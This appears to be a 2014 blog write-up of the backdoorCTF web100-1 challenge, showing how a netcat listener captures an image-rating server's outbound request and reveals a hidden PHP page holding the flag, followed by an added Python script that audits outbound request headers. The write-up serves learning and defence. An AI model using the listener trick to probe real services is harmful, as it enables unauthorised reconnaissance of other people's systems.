Mehran's Boring Blog

daily so-called-technical experiences

I found myself publishing things, which may or may not be taken seriously.

Sunday, 23 March 2014, 03:46 AM

backdoorCTF 2014 - web100-1 writeup

Of course the web server has to "fetch" the image file to rate it, so let's look at the request it sends. Just fire up netcat -lkv 54321 and submit the image link http://YOURIP:54321/. You should get something like:
listening on [any] 54321 ...
connect to [YOURIP] from backdoor.cognizance.org.in [128.199.215.224] 46845
GET / HTTP/1.1
Host: YOURIP:54321
Accept: */*
X-Referrer: 92702a9381515494689f5d14f85a83b7.php

OK, there's an interesting X-Referrer header waiting for us. What if we try to go to that URL? Oops, that's a super secret page, containing the message "By the way, the flag is f556b9a48a3ee914f291f9b98645cb02" inside an HTML comment.
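
As an added example (not part of the original writeup or the challenge's code), here is one way to audit what a server-side fetcher sends out, run over the request captured above. The allowlist, the file-name pattern and the function names are assumptions made for this illustration.

```python
import re

# Headers a plain image fetch is expected to send (assumed allowlist).
ALLOWED_HEADERS = {"host", "accept", "user-agent", "accept-encoding", "connection"}

# Values that look like a server-side script or file name (assumed heuristic).
INTERNAL_VALUE = re.compile(r"[\w./-]+\.(?:php|asp|aspx|jsp|cgi|inc|bak)\b", re.I)

# The request captured in the post, placeholder host kept as-is.
CAPTURED = (
    "GET / HTTP/1.1\r\n"
    "Host: YOURIP:54321\r\n"
    "Accept: */*\r\n"
    "X-Referrer: 92702a9381515494689f5d14f85a83b7.php\r\n"
    "\r\n"
)

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, [(name, value), ...])."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise ValueError("malformed request line: %r" % lines[0])
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep or not name.strip():
            raise ValueError("malformed header line: %r" % line)
        headers.append((name.strip(), value.strip()))
    return parts[0], parts[1], headers

def audit_outbound(raw):
    """Return [(header, [reasons])] for headers an outbound fetch should not carry."""
    findings = []
    for name, value in parse_request(raw)[2]:
        reasons = []
        if name.lower() not in ALLOWED_HEADERS:
            reasons.append("not in allowlist")
        # Host is skipped: it legitimately names the destination.
        if name.lower() != "host" and INTERNAL_VALUE.search(value):
            reasons.append("value looks like a server-side file name")
        if reasons:
            findings.append((name, reasons))
    return findings

if __name__ == "__main__":
    for name, reasons in audit_outbound(CAPTURED):
        print("%s: %s" % (name, "; ".join(reasons)))
```

Running the same check against requests your own fetcher makes to a test listener shows whether anything beyond the expected headers leaves the server.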
Mehran

web
